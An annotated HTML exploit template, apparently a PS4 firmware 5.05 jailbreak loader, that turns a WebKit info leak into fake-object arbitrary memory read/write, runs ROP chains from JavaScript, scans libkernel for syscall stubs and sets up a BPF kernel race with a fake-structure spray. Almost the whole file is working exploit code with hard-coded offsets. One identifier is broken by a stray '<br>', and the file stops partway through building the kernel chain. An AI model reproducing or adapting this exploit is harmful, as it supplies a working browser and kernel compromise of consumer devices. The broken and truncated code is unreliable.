<!DOCTYPE html>
<!--
  exploit.template: PS4 5.05 browser (WebKit) + kernel exploit loader.

  This is a build-time template. The bare `###` marker inside the script is
  presumably replaced by the generator with a `var payload=[...];` dword
  array: `payload` is used below but never defined in this file. Every
  gadget, library and kernel offset in the script is hard-coded for the
  firmware named in the title and is not meaningful elsewhere.
-->
<html><head> <title>PS4Jailbreak 5.05</title> <meta name=viewport content="width=device-width, initial-scale=1">
<style>
.config{position: absolute; left: 50%; top: 50%; margin: -75px 0 0 -75px; width: 120px; height: 120px;text-align: center;}
.loader{position: absolute; left: 50%; top: 50%; margin: -75px 0 0 -75px; border: 10px solid #f3f3f3; border-radius: 50%; border-top: 10px solid #044595; border-left: 10px solid #044595; width: 120px; height: 120px; -webkit-animation: spin 1s linear infinite}
.info{overflow: hidden; position: fixed; position: absolute; top: 50%; left: 50%; font-size: 45px; font-family: sans-serif; transform: translate(-50%, -50%)}
.credits{overflow: hidden; position: fixed; position: absolute; top: 90%; left: 50%; font-size: 16px; font-family: sans-serif; text-align: center; transform: translate(-50%, -90%)}
@-webkit-keyframes spin{0%{-webkit-transform: rotate(0deg)}100%{-webkit-transform: rotate(360deg)}}
</style></head><body style=margin:0>
<!-- #loader starts out as the configuration picker; window.onload turns it
     into the spinner once a value has been chosen. The option values are
     the numbers patched into the payload in place of its 1337 sentinel. -->
<div id=loader class=config>Configuration: <select id=config><option value="" selected disabled hidden>--</option><option value="1337">Install Cache</option><option value="1">Install Cache + Add Browser Hack</option><option value="0">Install Cache + Remove Browser Hack</option></select></div>
<div id=done class=info style=display:none>Done.</div>
<div id=fail class=info style=display:none>Fail!</div>
<div id=footer class=credits> <ul style=list-style:none;padding-left:0> <li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li>anonymous contributors</li></ul> </div>
<script>
// ---------------------------------------------------------------------------
// Globals shared by every stage.
//   p  - arbitrary read/write primitive; assigned once the type confusion
//        below has been established (declared early so closures can see it)
//   s  - syscall number -> libkernel address of a raw syscall stub, filled
//        by scanning libkernel inside exploit()
//   g  - gadget name -> absolute address (gc rebased onto the WebKit base)
//   gc - gadget offsets from the WebKit image base, hard-coded for this
//        firmware. Names spell the instruction; a doubled underscore marks a
//        memory operand (mov__rdi__rsi = mov [rdi], rsi).
// ---------------------------------------------------------------------------
var p; var s={}; var g={};
var gc={"pop_r8": 96709, "pop_r9": 12268047, "pop_rax": 17397, "pop_rcx": 339545, "pop_rdx": 1826852, "pop_rsi": 586634, "pop_rdi": 232890, "pop_rsp": 124551, "jmp_rax": 130, "jmp_rdi": 2711166,
  "mov_rdx_rax": 3488561, "mov_rdi_rax": 22692143, "mov_rax_rdx": 1896224, "mov_rbp_rsp": 985418, "mov__rdi__rax": 3857131, "mov__rdi__rsi": 146114, "mov__rax__rsi": 2451047, "mov_rax__rax__": 444474, "mov_rax__rdi__": 290553,
  "add_rax_rsi": 1384646, "and_rax_rsi": 22481823, "add_rdi_rax": 5593055, "jop": 800720, "ret": 60, "stack_chk_fail": 200, "setjmp": 5368};

// Page flow. Until a configuration has been picked, only wire up the
// <select>; its change handler stores the value and re-invokes onload, which
// then swaps the picker for the spinner and starts exploit() after 3 s.
window.onload=function(){
  if (window.configuration){
    document.getElementById('loader').innerHTML='';
    document.getElementById('loader').className='loader';
    setTimeout(exploit, 3000);
  }else{
    document.getElementById('config').addEventListener('change', function(){window.configuration=this.value;window.onload();});
  }
};

// Global error handler doubling as the retry loop: an explicit
// `throw new Error(...)` from the exploit shows its message, while any other
// uncaught error (typically a crash-like TypeError from a bad heap layout)
// reloads the page, i.e. silently re-runs the whole exploit.
// NOTE(review): the reload path discards the failure reason entirely; `e` is
// the message string, so only "Error:"-prefixed messages ever surface.
window.onerror=function(e){
  document.getElementById("loader").style.display="none";
  document.getElementById("fail").style.display="block";
  if (e.startsWith("Error:")==true){alert(e);}else{location.reload();};
};

// Hide the spinner and show "Done." (called at the very end of exploit()).
function done(){document.getElementById("loader").style.display="none"; document.getElementById("done").style.display="block";};

// ROP chain builder. The chain lives in a 256 KiB Uint32Array; stackBase is
// the address of its data buffer (read from the typed array's backing-store
// pointer at +16 via the primitive). `count` indexes 8-byte slots.
var rop=function(){
  this.stack=new Uint32Array(65536);
  this.stackBase=p.read8(p.leakval(this.stack).add32(16));
  this.count=0;
  // Zero only the first 4080/2 = 2040 slots (16320 bytes); anything beyond,
  // e.g. the return-value slot at +16376 used by p.fcall_, is never cleared.
  this.clear=function(){this.count=0; this.runtime=undefined; for (var i=0; i < 4080 / 2; i++){p.write8(this.stackBase.add32(i * 8), 0);};};
  // Reserve a slot now and fill it later with finalizeSymbolic (forward
  // references inside a chain).
  this.pushSymbolic=function(){this.count++; return this.count - 1;};
  this.finalizeSymbolic=function(idx, val){p.write8(this.stackBase.add32(idx * 8), val);};
  this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(), val);};
  // Emit `*(where) = what` as pop rdi / pop rsi / mov [rdi], rsi.
  this.push_write8=function(where, what){this.push(g.pop_rdi); this.push(where); this.push(g.pop_rsi); this.push(what); this.push(g.mov__rdi__rsi);};
  // Load up to six SysV argument registers (an undefined argument leaves the
  // register alone; 0 is loaded) and return into rip.
  this.fcall=function(rip, rdi, rsi, rdx, rcx, r8, r9){
    if (rdi !=undefined){this.push(g.pop_rdi); this.push(rdi);};
    if (rsi !=undefined){this.push(g.pop_rsi); this.push(rsi);};
    if (rdx !=undefined){this.push(g.pop_rdx); this.push(rdx);};
    if (rcx !=undefined){this.push(g.pop_rcx); this.push(rcx);};
    if (r8 !=undefined){this.push(g.pop_r8); this.push(r8);};
    if (r9 !=undefined){this.push(g.pop_r9); this.push(r9);};
    this.push(rip);
    return this;
  };
  // Execute via p.loadchain (launch_chain, installed in exploit()); the
  // second argument is not used by launch_chain. The chain is reset after.
  this.run=function(){var retv=p.loadchain(this, this.notimes); this.clear(); return retv;};
  return this;
};

// Eight-character random property name. Randomness quality is irrelevant
// here; it only has to give each spray object a distinct named property.
function makeid(){var text=""; var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i=0; i < 8; i++){text +=possible.charAt(Math.floor(Math.random() * possible.length));}; return text;};

// Heap grooming: 4096 one-element typed arrays, each with a uniquely named
// property. Presumably shapes the heap for the info leak below - TODO confirm.
var instancespr=[]; for (var i=0; i < 4096; i++){instancespr[i]=new Uint32Array(1); instancespr[i][makeid()]=50057;};

// Reinterpret a (low, hi) pair of 32-bit words as the double with that bit
// pattern. DataView defaults to big-endian, so `hi` at offset 0 becomes the
// high word of the resulting double.
var _dview; function u2d(low, hi){if (!_dview) _dview=new DataView(new ArrayBuffer(16)); _dview.setUint32(0, hi); _dview.setUint32(4, low); return _dview.getFloat64(0);};

// Left-pad number's string form with "0" to `width` characters (one extra
// zero when the text contains a "."). Only used by int64.toString here.
function zeroFill(number, width){width -=number.toString().length; if (width > 0){return new Array(width + (/\./.test(number) ? 2 : 1)).join("0") + number;}; return number + "";};

// Minimal unsigned 64-bit integer held as two uint32 words. Only 32-bit
// addends/subtrahends are supported; add32/sub32 return fresh objects, the
// *inplace variants mutate. `val` is treated as an unsigned 32-bit quantity -
// a negative addend would spuriously carry into `hi`.
// NOTE(review): there is no valueOf(), so an int64 used where a Number is
// expected (e.g. stored into a typed array) is converted through toString()
// -> hex text -> Number(), which only yields the right value for 0-9.
function int64(low, hi){
  this.low=(low >>> 0); this.hi=(hi >>> 0);
  // `& 4294967295` wraps to int32, `>>> 0` makes it unsigned again; a carry is
  // detected by the new low word being smaller than the old one.
  this.add32=function(val){var new_lo=(((this.low >>> 0) + val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo < this.low){new_hi++;}; return new int64(new_lo, new_hi);};
  this.add32inplace=function(val){var new_lo=(((this.low >>> 0) + val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo < this.low){new_hi++;}; this.hi=new_hi; this.low=new_lo;};
  // Borrow test: `>` binds tighter than `&`, so the condition is really
  // `(new_lo > this.low) & 0xFFFFFFFF`, i.e. 1 or 0 - which happens to be the
  // intended "did the low word wrap upwards" test, just written confusingly.
  this.sub32=function(val){var new_lo=(((this.low >>> 0) - val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo > (this.low) & 4294967295){new_hi--;}; return new int64(new_lo, new_hi);};
  this.sub32inplace=function(val){var new_lo=(((this.low >>> 0) - val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo > (this.low) & 4294967295){new_hi--;}; this.hi=new_hi; this.low=new_lo;};
  // Hexadecimal rendering; the `val` parameter is ignored (radix forced to
  // 16). The low word is zero-padded to 8 digits only when hi is non-zero.
  this.toString=function(val){val=16; var lo_str=(this.low >>> 0).toString(val); var hi_str=(this.hi >>> 0).toString(val); if (this.hi==0) return lo_str; else{lo_str=zeroFill(lo_str, 8);}; return hi_str + lo_str;};
  return this;
};

// ---------------------------------------------------------------------------
// Stage 1: information leak.
// y.data.buffer is transferred away by postMessage (which detaches it), then
// `y` is structured-cloned into history state right after a 16 KiB run of
// property descriptors alternating {value: 0x42424242} / {value: tgt} has
// been allocated. The buffer read back from history.state is scanned for
// that pattern; the two words at +8/+9 (deliberately left out of the match)
// are taken as the JSValue of `tgt`, i.e. its address. Why the clone exposes
// that memory is not visible here - presumably a lifetime bug in the
// detached-buffer clone path of this WebKit build (TODO confirm).
// ---------------------------------------------------------------------------
var nogc=[];                         // pins buffers that native code keeps pointers to
var tgt={a: 0, b: 0, c: 0, d: 0};    // its inline properties are later used as a fake object
var y=new ImageData(1, 16384);
postMessage("", "*", [y.data.buffer]);
var props={}; for (var i=0; i < 16384 / 2;){props[i++]={value: 1111638594}; props[i++]={value: tgt};};
var foundLeak=undefined; var foundIndex=0; var maxCount=256;
// Up to 256 attempts. The pattern reaches leak[i + 15] while the loop stops
// at length - 6; out-of-range typed-array reads yield undefined, which simply
// fails the `== 0` comparison, so this is harmless.
while (foundLeak==undefined && maxCount > 0){maxCount--; history.pushState(y, ""); Object.defineProperties({}, props); var leak=new Uint32Array(history.state.data.buffer); for (var i=0; i < leak.length - 6; i++){if (leak[i]==1111638594 && leak[i + 1]==4294901760 && leak[i + 2]==0 && leak[i + 3]==0 && leak[i + 4]==0 && leak[i + 5]==0 && leak[i + 6]==14 && leak[i + 7]==0 && leak[i + 10]==0 && leak[i + 11]==0 && leak[i + 12]==0 && leak[i + 13]==0 && leak[i + 14]==14 && leak[i + 15]==0){foundIndex=i; foundLeak=leak; break;};};};
if (!foundLeak){throw new Error("infoleak fail");};

// ---------------------------------------------------------------------------
// Stage 2: fake object -> arbitrary read/write.
// A getter is installed on Array.prototype[100] while two arrays from a
// child iframe's realm are concatenated; `b` carries the leaked address of
// tgt + 16 encoded as a double. Afterwards c[0] is used as an object (`hax`)
// whose element slots are read and written directly, so the concat result
// must alias the fake object whose header is tgt.a and whose butterfly is
// tgt.c - the exact engine bug is not visible here. Repointing tgt.c
// selects which array `hax` reads through.
// ---------------------------------------------------------------------------
Array.prototype.__defineGetter__(100, ()=> 1);
var firstLeak=Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 64);
var leakJSVal=new int64(firstLeak[8], firstLeak[9]);
var f=document.body.appendChild(document.createElement("iframe"));
var a=new f.contentWindow.Array(13.37, 13.37);
var b=new f.contentWindow.Array(u2d(leakJSVal.low + 16, leakJSVal.hi), 13.37);
// master/slave: master's element slots 4/5 end up overlaying the pointer that
// slave's element reads go through, giving read/write at any address via
// slave[0..1] (see `p` below). leakval_u32/leakval_helper are used to pull
// out that pointer during setup.
var master=new Uint32Array(4096); var slave=new Uint32Array(4096); var leakval_u32=new Uint32Array(4096);
var leakval_helper=[slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
tgt.a=u2d(2048, 23077632); tgt.b=0; tgt.c=leakval_helper; tgt.d=4919;
var c=Array.prototype.concat.call(a, b);
document.body.removeChild(f);
var hax=c[0]; c[0]=0; tgt.c=c; hax[2]=0; hax[3]=0;
Object.defineProperty(Array.prototype, 100,{get: undefined});   // take the getter down again
tgt.c=leakval_helper;
var butterfly=new int64(hax[2], hax[3]); butterfly.low +=16;   // plain += on .low: no carry handling
tgt.c=leakval_u32;
var lkv_u32_old=new int64(hax[4], hax[5]);
hax[4]=butterfly.low; hax[5]=butterfly.hi;
tgt.c=master;
hax[4]=leakval_u32[0]; hax[5]=leakval_u32[1];
// a2sb: the value master[4]/master[5] must hold while the primitive is idle;
// every accessor in `p` restores it.
var a2sb=new int64(master[4], master[5]);
tgt.c=leakval_u32;
hax[4]=lkv_u32_old.low; hax[5]=lkv_u32_old.hi;   // undo the temporary repointing
tgt.c=0; hax=0;

// Read/write primitive. Each accessor points master[4..5] at the target,
// touches slave[0..1], and restores master[4..5] to a2sb before returning,
// so the primitive is only "armed" for the duration of one call. write8
// accepts an int64 or a plain Number (high word 0).
var p={
  write8: function(addr, val){master[4]=addr.low; master[5]=addr.hi; if (val instanceof int64){slave[0]=val.low; slave[1]=val.hi;}else{slave[0]=val; slave[1]=0;}; master[4]=a2sb.low; master[5]=a2sb.hi;},
  write4: function(addr, val){master[4]=addr.low; master[5]=addr.hi; slave[0]=val; master[4]=a2sb.low; master[5]=a2sb.hi;},
  read8: function(addr){master[4]=addr.low; master[5]=addr.hi; var rtv=new int64(slave[0], slave[1]); master[4]=a2sb.low; master[5]=a2sb.hi; return rtv;},
  read4: function(addr){master[4]=addr.low; master[5]=addr.hi; var rtv=slave[0]; master[4]=a2sb.low; master[5]=a2sb.hi; return rtv;},
  // addrof: park jsval in leakval_helper[0], read the raw JSValue back from
  // the butterfly, then overwrite that slot with the int JSValue 0x41414141
  // so no reference to jsval stays behind. For a Number argument the result
  // is its encoded JSValue, not an address (p.fcall_ relies on the low word
  // of an int JSValue being the int itself).
  leakval: function(jsval){leakval_helper[0]=jsval; var rtv=this.read8(butterfly); this.write8(butterfly, new int64(1094795585, 4294901760)); return rtv;}
};

// Resolve a `jmp [rip+disp32]` (bytes FF 25 disp32, 0x25FF little-endian)
// at addr to the address of the slot it jumps through: addr + 6 + disp32.
// NOTE(review): on an opcode mismatch this returns the Number 0, not an
// int64, and both callers in exploit() (libKernelBase, memcpy) feed the
// result straight into p.read8 without checking - `0.low` is undefined, so
// the primitive ends up reading address 0 (a crash) instead of failing with
// a clear error. The displacement is added as an unsigned value via
// int64.add32, so a negative disp32 would be mis-resolved.
var get_jmptgt=function(addr){var z=p.read4(addr) & 65535; var y=p.read4(addr.add32(2)); if (z !=9727) return 0; return addr.add32(y + 6);};

// ---------------------------------------------------------------------------
// Stage 3: resolve the WebKit and libkernel bases, build a way to run ROP
// chains from JS, locate raw syscall stubs, run the kernel exploit (unless
// the kernel is already patched) and finally start the user payload.
// ---------------------------------------------------------------------------
var exploit=function(){
  // Address of the slot holding a built-in function's native entry
  // (object +24 -> executable, +64 -> native function pointer; layout is
  // firmware-specific).
  p.leakfunc=function(func){var fptr_store=p.leakval(func); return (p.read8(fptr_store.add32(24))).add32(64);};
  var parseFloatStore=p.leakfunc(parseFloat);
  // WebKit base: page-align parseFloat's native address (0xFFFFF000 mask)
  // and subtract its hard-coded offset inside the image.
  var webKitBase=p.read8(parseFloatStore); webKitBase.low &=4294963200; webKitBase.sub32inplace(5881856 - 147456);
  var o2wk=function(o){return webKitBase.add32(o);};
  for (var gn in gc){if (gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};
  // libkernel base through the jump slot of the stack_chk_fail import stub,
  // same page-align + fixed-offset trick. (get_jmptgt's 0 result is not
  // checked here - see its comment.)
  var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail)); libKernelBase.low &=4294963200; libKernelBase.sub32inplace(53248 + 16384);
  // A Uint8Array whose backing pointer/length are rewritten to span the
  // WebKit image. NOTE(review): wkview is never read afterwards (kview below
  // does the same for libkernel and is actually used).
  var wkview=new Uint8Array(4096); var wkstr=p.leakval(wkview).add32(16); p.write8(wkstr, webKitBase); p.write4(wkstr.add32(8), 57131008);
  // Allocate pairs of four-property objects until hold1 sits exactly 48 bytes
  // after hold2; hold2's memory is later rewritten to hijack a native call.
  // holdz itself is not used after the loop.
  var hold1; var hold2; var holdz; var holdz1;
  while (1){hold1={a: 0, b: 0, c: 0, d: 0}; hold2={a: 0, b: 0, c: 0, d: 0}; holdz1=p.leakval(hold2); holdz=p.leakval(hold1); if (holdz.low - 48==holdz1.low) break;};
  var pushframe=[]; pushframe.length=128;   // NOTE(review): unused
  var funcbuf; var funcbuf32=new Uint32Array(256); nogc.push(funcbuf32);
  // Run a rop chain on the real native stack.
  //  1. parseFloat's native entry is pointed at the JOP gadget and hold2 is
  //     temporarily rewritten to point at funcbuf (which holds setjmp at +48
  //     and the JOP gadget at +128), so parseFloat(hold2, ...) ends up in
  //     setjmp with funcbuf as the jmp_buf; the saved rsp is read back from
  //     funcbuf+16 afterwards.
  //  2. Array.prototype.splice.apply(reenter_help) makes splice convert
  //     reenter_help.length through valueOf while its native frame is live.
  //     The callback appends to the chain a restore of the two qwords it is
  //     about to clobber ([sp], [sp+8]) plus a `pop rsp` back to the frame,
  //     then overwrites [sp] with `pop rsp` and [sp+8] with the chain's base,
  //     so that splice "returns" into the chain. chain.runtime(sp), if set,
  //     may pick a different frame to return to. chain.count is rewound
  //     afterwards only for bookkeeping; the epilogue stays in memory.
  // The assumption that the rsp captured in step 1 equals splice's return
  // address slot in step 2 (identical native call depth) is not verifiable
  // here - TODO confirm.
  // NOTE(review): parseFloat's entry is never restored (g.jop is written on
  // every call), so parseFloat must not be used normally after this. `rtv`
  // below is not local to launch_chain; it resolves to the `var rtv`
  // hoisted from the kernel section further down in exploit().
  var launch_chain=function(chain){
    var stackPointer=0; var stackCookie=0; var orig_reenter_rip=0;
    var reenter_help={length:{valueOf: function(){
      orig_reenter_rip=p.read8(stackPointer); stackCookie=p.read8(stackPointer.add32(8));
      var returnToFrame=stackPointer; var ocnt=chain.count;
      chain.push_write8(stackPointer, orig_reenter_rip); chain.push_write8(stackPointer.add32(8), stackCookie);
      if (chain.runtime) returnToFrame=chain.runtime(stackPointer);
      chain.push(g.pop_rsp); chain.push(returnToFrame);
      chain.count=ocnt;
      p.write8(stackPointer, (g.pop_rsp)); p.write8(stackPointer.add32(8), chain.stackBase);
    }}};
    funcbuf=p.read8(p.leakval(funcbuf32).add32(16));
    p.write8(funcbuf.add32(48), g.setjmp); p.write8(funcbuf.add32(128), g.jop); p.write8(funcbuf, funcbuf);
    p.write8(parseFloatStore, g.jop);
    var orig_hold=p.read8(holdz1); var orig_hold48=p.read8(holdz1.add32(72));   // name says 48, offset is 72 (24 bytes into hold1)
    p.write8(holdz1, funcbuf.add32(80)); p.write8(holdz1.add32(72), funcbuf);
    parseFloat(hold2, hold2, hold2, hold2, hold2, hold2);
    p.write8(holdz1, orig_hold); p.write8(holdz1.add32(72), orig_hold48);
    stackPointer=p.read8(funcbuf.add32(16));   // rsp as saved by setjmp
    rtv=Array.prototype.splice.apply(reenter_help);
    return p.leakval(rtv);
  };
  p.loadchain=launch_chain;
  // Expose libkernel through a typed array (backing pointer -> libKernelBase,
  // length -> 256 KiB), find the end of the region to scan by locating the
  // bytes "rdloc" (114,100,108,111,99), then shrink the view to that size.
  // NOTE(review): if the marker is absent, countbytes stays undefined, the
  // stub scan below finds nothing and the first p.syscall throws
  // "invalid syscall" - functional, but a misleading message.
  var kview=new Uint8Array(4096); var kstr=p.leakval(kview).add32(16); p.write8(kstr, libKernelBase); p.write4(kstr.add32(8), 262144);
  var countbytes;
  for (var i=0; i < 262144; i++){if (kview[i]==114 && kview[i + 1]==100 && kview[i + 2]==108 && kview[i + 3]==111 && kview[i + 4]==99){countbytes=i; break;};};
  p.write4(kstr.add32(8), countbytes + 32);
  // Every `48 C7 C0 imm32` / `49 89 CA` / `0F 05` sequence
  // (mov rax, imm32; mov r10, rcx; syscall) is a raw syscall stub; record its
  // address under the immediate. dview8/dview32 reassemble the little-endian
  // immediate from the four bytes following the opcode.
  var dview32=new Uint32Array(1); var dview8=new Uint8Array(dview32.buffer);
  for (var i=0; i < countbytes; i++){if (kview[i]==72 && kview[i + 1]==199 && kview[i + 2]==192 && kview[i + 7]==73 && kview[i + 8]==137 && kview[i + 9]==202 && kview[i + 10]==15 && kview[i + 11]==5){dview8[0]=kview[i + 3]; dview8[1]=kview[i + 4]; dview8[2]=kview[i + 5]; dview8[3]=kview[i + 6]; var syscallno=dview32[0]; s[syscallno]=libKernelBase.add32(i);};};
  // Call a native address with up to six register arguments on a ROP chain
  // and return rax as an int64. The chain stores rax into the slot at
  // stackBase+16376, then loads the JSValue of the marker 0x41414242 into
  // rax; since splice's own return value is whatever is in rax when the
  // hijacked frame returns, the marker coming back proves the chain ran to
  // its end. notimes/next_notime are passed through but unused.
  var chain=new rop(); var returnvalue;
  p.fcall_=function(rip, rdi, rsi, rdx, rcx, r8, r9){chain.clear(); chain.notimes=this.next_notime; this.next_notime=1; chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9); chain.push(g.pop_rdi); chain.push(chain.stackBase.add32(16376)); chain.push(g.mov__rdi__rax); chain.push(g.pop_rax); chain.push(p.leakval(1094795842)); if (chain.run().low !=1094795842){throw new Error("unexpected rop behaviour");}; returnvalue=p.read8(chain.stackBase.add32(16376));};
  p.fcall=function(){p.fcall_.apply(this, arguments); return returnvalue;};
  // Read a NUL-terminated byte string, one 4-byte read per character.
  p.readstr=function(addr){var addr_=addr.add32(0); var rd=p.read4(addr_); var buf=""; while (rd & 255){buf +=String.fromCharCode(rd & 255); addr_.add32inplace(1); rd=p.read4(addr_);}; return buf;};
  // Raw syscall by number through the stubs found above; throws on an
  // unknown number rather than jumping somewhere undefined.
  p.syscall=function(sysc, rdi, rsi, rdx, rcx, r8, r9){if (typeof sysc !="number"){throw new Error("invalid syscall");}; var off=s[sysc]; if (off==undefined){throw new Error("invalid syscall");}; return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);};
  // Address of a NUL-terminated copy of str (char codes truncated to 8 bits;
  // the buffer is pinned in nogc).
  p.sptr=function(str){var bufView=new Uint8Array(str.length + 1); for (var i=0; i < str.length; i++){bufView[i]=str.charCodeAt(i) & 255;}; nogc.push(bufView); return p.read8(p.leakval(bufView).add32(16));};
  // Allocate sz bytes (plus 64 KiB of slack - presumably to force an
  // out-of-line backing store) and return the address of the data; .backing
  // is the JS view onto the same memory. malloc32 sizes in dwords and
  // exposes a Uint32Array view over the *whole* buffer, slack included.
  p.malloc=function(sz){var backing=new Uint8Array(65536 + sz); nogc.push(backing); var ptr=p.read8(p.leakval(backing).add32(16)); ptr.backing=backing; return ptr;};
  p.malloc32=function(sz){var backing=new Uint8Array(65536 + sz * 4); nogc.push(backing); var ptr=p.read8(p.leakval(backing).add32(16)); ptr.backing=new Uint32Array(backing.buffer); return ptr;};
  // ---- kernel exploit -------------------------------------------------------
  // syscall 23 with argument 0 (setuid(0) under FreeBSD numbering) returning
  // 0 means the kernel is already patched; the race is then skipped and only
  // the payload is launched. `test` is an int64, compared via its toString.
  var test=p.syscall(23, 0);
  if (test !="0"){
    // Two descriptors on /dev/bpf0 (syscall 5 = open, flags 2 presumably
    // O_RDWR). NOTE(review): only fd is checked against -1; fd1 is not.
    var fd=p.syscall(5, p.sptr("/dev/bpf0"), 2).low; var fd1=p.syscall(5, p.sptr("/dev/bpf0"), 2).low;
    if (fd==(-1 >>> 0)){throw new Error("open bpf fail");};
    // Two struct bpf_program {bf_len = 2048/8 = 256, bf_insns}. bpf_valid is
    // filled with 1024 dwords of (code 6, jt/jf 0, k 0) = 512 instruction
    // slots of BPF_RET|BPF_K 0, a harmless filter. bpf_spray is filled
    // further down with fake structures instead of instructions.
    var bpf_valid=p.malloc32(16384); var bpf_spray=p.malloc32(16384); var bpf_valid_u32=bpf_valid.backing;
    var bpf_valid_prog=p.malloc(64); p.write8(bpf_valid_prog, 2048 / 8); p.write8(bpf_valid_prog.add32(8), bpf_valid);
    var bpf_spray_prog=p.malloc(64); p.write8(bpf_spray_prog, 2048 / 8); p.write8(bpf_spray_prog.add32(8), bpf_spray);
    for (var i=0; i < 1024;){bpf_valid_u32[i++]=6; bpf_valid_u32[i++]=0;};
    // Install the valid filter once (ioctl request 0x8010427B, presumably
    // BIOCSETWF) to make sure the device accepts it before racing.
    var rtv=p.syscall(54, fd, 2148549243, bpf_valid_prog);
    if (rtv.low !=0){throw new Error("ioctl bpf fail");};
    // Start a native thread that runs `chain` as a ROP stack. createThread
    // (WebKit-internal, fixed offset) gets longjmp as the thread entry and
    // contextp as its argument: a jmp_buf with the `ret` gadget at +0 (rip)
    // and the thread's ROP stack at +16 (rsp) - the same +16 = saved-rsp
    // layout launch_chain reads back from funcbuf. syscall 324 with 1
    // (mlockall(MCL_CURRENT) under FreeBSD numbering) is issued first,
    // presumably to keep the pages resident. The returned closure is what
    // actually launches the thread. contextz[0]=1337 is immediately
    // overwritten by the write8 of g.ret.
    var spawnth<br>read=function(name, chain){var longjmp=webKitBase.add32(5352); var createThread=webKitBase.add32(7836560); var contextp=p.malloc32(8192); var contextz=contextp.backing; contextz[0]=1337; var thread2=new rop(); thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.ret); chain(thread2); p.write8(contextp, g.ret); p.write8(contextp.add32(16), thread2.stackBase); p.syscall(324, 1); var retv=function(){p.fcall(createThread, longjmp, contextp, p.sptr(name));}; nogc.push(contextp); nogc.push(thread2); return retv;};
    var interrupt1, loop1;
    // socket(AF_INET, SOCK_DGRAM) - used as the kevent ident below.
    // NOTE(review): unlike fd/fd1 this is kept as an int64 (no .low); see the
    // kev setup for why that only works for small descriptor numbers.
    var sock=p.syscall(97, 2, 2);
    var kscratch=p.malloc32(4096);   // scratch qwords for the kernel chain; [0] != 0 signals it ran
    // Worker thread for the race. Its ROP stack: 7 rets, then load
    // ioctl(fd, 0x8010427B, bpf_valid_prog) and pivot to slot 256, call the
    // ioctl stub, re-store the stub address into slot 256 (the callee's frame
    // sits below rsp and clobbers it), then park in a tight `pop rsp` loop:
    // slot 268 (loop1) is made to point at slot 267 (the pop_rsp gadget), so
    // the thread keeps re-reading loop1. The main thread wakes it by writing
    // interrupt1 (= slot 0) into loop1, which restarts the stack from the
    // top and fires exactly one more ioctl before it parks again.
    var start1=spawnthread("GottaGoFast", function(thread2){interrupt1=thread2.stackBase; thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.pop_rdi); thread2.push(fd); thread2.push(g.pop_rsi); thread2.push(2148549243); thread2.push(g.pop_rdx); thread2.push(bpf_valid_prog); thread2.push(g.pop_rsp); thread2.push(thread2.stackBase.add32(2048)); thread2.count=256; var cntr=thread2.count; thread2.push(s[54]); thread2.push_write8(thread2.stackBase.add32(cntr * 8), s[54]); thread2.push(g.pop_rdi); var wherep=thread2.pushSymbolic(); thread2.push(g.pop_rsi); var whatp=thread2.pushSymbolic(); thread2.push(g.mov__rdi__rsi); thread2.push(g.pop_rsp); loop1=thread2.stackBase.add32(thread2.count * 8); thread2.push(1094795585); thread2.finalizeSymbolic(wherep, loop1); thread2.finalizeSymbolic(whatp, loop1.sub32(8));});
    // Fake-structure spray. bpf_spray (the buffer handed to the second
    // ioctl) is laid out as a chain of fake objects - ctxp -> ctxp1/ctxp2 ->
    // fifteen linked 32-byte records -> raxbase/rdibase - whose
    // function-pointer slots point at WebKit code and end in a stack pivot
    // (mov rbp, rsp) onto krop's stack. What the kernel interprets these as,
    // and the meaning of the individual offsets, is firmware-specific and
    // not recoverable from this file. stackshift_from_retaddr accumulates
    // how far the pivoted stack ends up from the original return address;
    // topofchain/rboff use it below to locate and adjust a saved return
    // address (presumably for a clean return out of the kernel).
    var krop=new rop(); var race=new rop();
    var ctxp=p.malloc32(8192); var ctxp1=p.malloc32(8192); var ctxp2=p.malloc32(8192);
    p.write8(bpf_spray.add32(16), ctxp);
    p.write8(ctxp.add32(80), 0); p.write8(ctxp.add32(104), ctxp1);
    var stackshift_from_retaddr=0;
    p.write8(ctxp1.add32(16), o2wk(19536333)); stackshift_from_retaddr +=8 + 88;
    p.write8(ctxp.add32(0), ctxp2); p.write8(ctxp.add32(16), ctxp2.add32(8));
    p.write8(ctxp2.add32(2000), o2wk(7271653));
    var iterbase=ctxp2;
    for (var i=0; i < 15; i++){p.write8(iterbase, o2wk(19536333)); stackshift_from_retaddr +=8 + 88; p.write8(iterbase.add32(2000 + 32), o2wk(7271653)); p.write8(iterbase.add32(8), iterbase.add32(32)); p.write8(iterbase.add32(24), iterbase.add32(32 + 8)); iterbase=iterbase.add32(32);};
    var raxbase=iterbase; var rdibase=iterbase.add32(8);
    // memcpy's real address via the import jump slot at WebKit+248
    // (get_jmptgt's 0 result is again not checked).
    var memcpy=get_jmptgt(webKitBase.add32(248)); memcpy=p.read8(memcpy);
    p.write8(raxbase, o2wk(22848539)); stackshift_from_retaddr +=8;
    p.write8(rdibase.add32(112), o2wk(19417140)); stackshift_from_retaddr +=8;
    p.write8(rdibase.add32(24), rdibase); p.write8(rdibase.add32(8), krop.stackBase);
    p.write8(raxbase.add32(48), g.mov_rbp_rsp); p.write8(rdibase, raxbase);
    p.write8(raxbase.add32(1056), o2wk(2566497)); p.write8(raxbase.add32(64), memcpy.add32(194 - 144));
    var topofchain=stackshift_from_retaddr + 40;
    p.write8(rdibase.add32(176), topofchain);
    // krop: pre-filled with a `ret` sled (first 512 slots), chain proper
    // starts at slot 16. It is built from the same user-mode WebKit gadgets
    // as the other chains.
    for (var i=0; i < 4096 / 8; i++){p.write8(krop.stackBase.add32(i * 8), g.ret);};
